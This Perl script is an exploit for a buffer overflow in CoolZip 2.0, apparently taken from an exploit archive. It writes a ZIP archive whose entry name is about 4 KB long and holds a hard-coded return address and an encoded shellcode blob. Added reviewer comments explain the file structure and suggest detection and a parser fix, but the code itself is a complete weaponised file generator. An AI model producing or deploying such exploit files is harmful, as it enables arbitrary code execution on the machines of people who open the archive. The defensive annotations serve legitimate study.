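#!/usr/bin/perl
#
#
#[+]Exploit Title: Exploit Buffer Overflow CoolZip 2.0
#[+]Date: 12\03\2011
#[+]Author: C4SS!0 G0M3S
#[+]Software Link: http://www.brothersoft.com/coolzip-download-7097.html
#[+]Version: 2.0
#[+]Tested On WIN-XP SP3 Portugues Brasil
#[+]CVE: N/A
#
#    xxx      xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
#xxx xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
# xxx xxx xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
#xxxxxxxx xxxxxx xxxxxx xxx xxxxxx
# xxx xxx xxxxxx xxxxxx xxxxxxxxxxxxxxxxxxxxxxxxxxxx
# xxxxxxxxx xxxxxx xxxxxx xxxxxxxxxxxxx
#xxxxxx xxx xxxxxx xxxxxx xxxxxxxxx xxxx xxxxxxx
#xxx xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxx xx xx xx
# xxx xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxx xxxxxxxxxxxxx
#
#
#
# NOTE(review): what this script produces, from a defender's point of view.
#   * It writes a ZIP archive holding one entry whose *name* is 4068 bytes long
#     (4064 bytes of data plus ".txt"). Both sizes and the CRC are zero, so the
#     entry carries no file data at all; everything of interest is in the name.
#   * The title says "Buffer Overflow", so the defect is presumably an unchecked
#     copy of the entry name into a fixed-size buffer in CoolZip 2.0. The page
#     does not show the vulnerable code - TODO confirm.
#   * Detection: an entry name of several kilobytes in a ZIP local or
#     central-directory header is anomalous, and a mail or web gateway can
#     reject it without inspecting the payload.
#   * Mitigation: the page lists no CVE and no fixed version. The real fix is
#     to validate the header's name length against the destination buffer in
#     the parser. The single hard-coded 32-bit value below suggests the sample
#     depends on a fixed memory layout (ASLR/DEP would interfere) - TODO confirm.
#
use strict;
use warnings;
use IO::File;

# Print the author's banner.
sub usage {
    print q{

              Exploit Buffer Overflow Coolzip 2.0
   ==============================================================
   ==============================================================
   ====================Author C4SS!0 G0M3S=======================
   ====================E-mail Louredo_@hotmail.com===============
   ====================Site www.exploit-br.org===================
   ==============================================================
   ==============================================================

};
}

# Console cosmetics only. The page's extraction turned the original backticks
# into <code>ver</code>, which is not valid Perl. $^O answers the same
# "is this Windows?" question without spawning a shell, and `title` (a cmd.exe
# built-in) is now issued only where it exists.
if ($^O eq 'MSWin32') {
    system("cls");
    system("color 4f");
    system("title Exploit Buffer Overflow Coolzip 2.0");
}
else {
    system("clear");
}

# An output file name is required. Testing defined/length rather than truth
# means a name such as "0" is accepted.
if (!defined $ARGV[0] || !length $ARGV[0]) {
    usage();
    print "\t\t[-]Modo de Uso: perl $0 <Nome_do_Arquivo>\n";
    print "\t\t[-]Exemplot: perl $0 Exploit.zip\n";
    exit;
}
usage();

# The original demanded an argument and then ignored it in favour of a
# hard-coded "Exploit.zip"; honour the name the usage text asks for.
my $File = $ARGV[0];

print "\t\t[+]Identifying the size Shellcode\n\n";
sleep(1);

# 30-byte block starting with the ZIP local-file-header signature PK\x03\x04.
# The bytes e4 0f are 0x0fe4 = 4068 little-endian, which equals the length of
# the entry name built below - apparently the name-length field.
my $head = "\x50\x4B\x03\x04\x14\x00\x00".
"\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" .
"\x00\x00\x00\x00\x00\x00\x00\x00" .
"\xe4\x0f" .
"\x00\x00\x00";

# 46-byte block starting with the central-directory signature PK\x01\x02; it
# repeats the same 0x0fe4 name length for the same entry.
my $head2 = "\x50\x4B\x01\x02\x14\x00\x14".
"\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" .
"\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\xe4\x0f".
"\x00\x00\x00\x00\x00\x00\x01\x00".
"\x24\x00\x00\x00\x00\x00\x00\x00";

# End-of-central-directory record (PK\x05\x06): one entry, central directory
# size 0x1012 (46 + 4068) at offset 0x1002 (30 + 4068). These values agree
# with the two blocks above, so the archive is structurally self-consistent.
my $head3 = "\x50\x4B\x05\x06\x00\x00\x00".
"\x00\x01\x00\x01\x00".
"\x12\x10\x00\x00".
"\x02\x10\x00\x00".
"\x00\x00";

# Entry name: 51 filler bytes, then one hard-coded 32-bit little-endian value,
# then filler up to byte 59.
# NOTE(review): the page does not say what 0x77454337 refers to. It is
# presumably an address valid only on the tested Windows XP SP3 build.
my $payload = "\x41" x 51;
$payload .= pack('V',0x77454337);
$payload .= "\x41" x (59-length($payload));

# Opaque alphanumeric-encoded blob supplied by the author. The page does not
# document what it does; analyse it in a sandbox rather than assuming it is
# harmless.
my $shellcode =
"TYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIWCO0V0SX3SSQRL3SPTPXO".
"NDMWUMVSL60KON6A";
print "\t\t[+]Length Shellcode:".length($shellcode)."\n\n";
sleep(1);

# Pad to 4064 bytes and add the extension: 4068 bytes in total, matching the
# 0x0fe4 length written into both headers.
$payload .= $shellcode;
$payload .= "\x41" x (4064-length($payload));
$payload = $payload.".txt";

# Remove any stale output first; if $File is a symlink this drops the link
# instead of writing through it.
unlink($File);
my $exploit = $head.$payload.$head2.$payload.$head3;
print "\t\t[+]Creating File $File...\n\n";
sleep(1);

# Three-argument open: the name now comes from the command line, and the
# two-argument form would let characters in it change the open mode.
# binmode keeps the archive bytes unmodified by CRLF translation on Windows.
open(my $f, '>', $File) or die "[+]Error:\n$!\n";
binmode($f);
print {$f} $exploit or die "[+]Error:\n$!\n";
# Buffered write errors only surface at close, so check it.
close($f) or die "[+]Error:\n$!\n";
print "\t\t[+]The File $File Was Created Successfully\n\n";
sleep(1);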